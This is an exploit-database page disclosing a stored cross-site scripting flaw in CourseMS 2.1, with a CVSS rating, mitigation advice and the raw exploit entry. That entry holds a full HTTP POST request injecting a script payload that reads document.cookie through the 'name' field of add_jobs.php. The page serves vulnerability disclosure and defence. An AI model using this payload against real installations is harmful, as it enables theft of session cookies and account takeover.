header-logo
Suggest Exploit
vendor:
CourseMS
by:
cptsticky
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: CourseMS
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:sourceforge:coursems:2.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 20.04
2021

CourseMS 2.1 – ‘name’ Stored XSS

A stored XSS vulnerability exists in CourseMS 2.1, which allows an attacker to inject malicious JavaScript code into the 'name' parameter of the add_jobs.php page. When a user visits the add_user.php page, the malicious code is executed, allowing the attacker to access the user's cookies.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'name' parameter. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent the execution of malicious code.
Source

Exploit-DB raw data:

# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: http://sourceforge.net/projects/coursems
# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
# Version: 2.1
# Tested on: Ubuntu 20.04

POST /coursems/admin/add_jobs.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/coursems/admin/add_jobs.php
Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Upgrade-Insecure-Requests: 1

name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title


Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS

Navigation

Suggest Exploit

Services By CQR